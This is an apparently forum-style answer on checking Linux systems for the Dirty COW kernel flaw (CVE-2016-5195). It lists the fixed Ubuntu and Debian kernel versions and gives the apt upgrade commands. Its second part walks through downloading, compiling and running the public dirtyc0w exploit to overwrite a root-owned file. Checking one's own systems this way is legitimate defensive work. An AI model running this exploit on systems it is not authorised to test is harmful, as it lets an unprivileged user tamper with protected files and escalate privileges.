How to make sure that my operating system is not affected by CVE-2016-5195 (Dirty COW)?
You can do uname -rv
to find out your Linux kernel version. You will get an output similar to below:
4.4.0-42-generic #62-Ubuntu SMP Fri Oct 7 23:11:45 UTC 2016
If your version is earlier than the following, you are affected:
4.8.0-26.28 for Ubuntu 16.10
4.4.0-45.66 for Ubuntu 16.04 LTS
3.13.0-100.147 for Ubuntu 14.04 LTS
3.2.0-113.155 for Ubuntu 12.04 LTS
3.16.36-1+deb8u2 for Debian 8
3.2.82-1 for Debian 7
4.7.8-1 for Debian unstable
According to security-tracker.debian, You need to run uname -a
and verify your current kernel version .
wheezy 3.2.78-1 vulnerable
wheezy (security) 3.2.82-1 fixed
jessie 3.16.36-1+deb8u1 vulnerable
jessie (security) 3.16.36-1+deb8u2 fixed
stretch, sid 4.7.8-1 fixed
This vulnerability is patched under debian , by upgrading your system :
apt-get update
apt-get upgrade
apt-get dist-upgrade
Edit
How to make sure that my operating system is not affected by CVE-2016-5195?
You can try the following tutorial.
Download the exploit.
wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
As root : Create the foo
file:
su
echo this is not a test > foo
As user :
gcc -lpthread dirtyc0w.c -o dirtyc0w
gcc -pthread dirtyc0w.c -o dirtyc0w
./dirtyc0w foo m00000000000000000
Verify your file:
cat foo
On vulnerable machine you will get m00000000000000000
as output.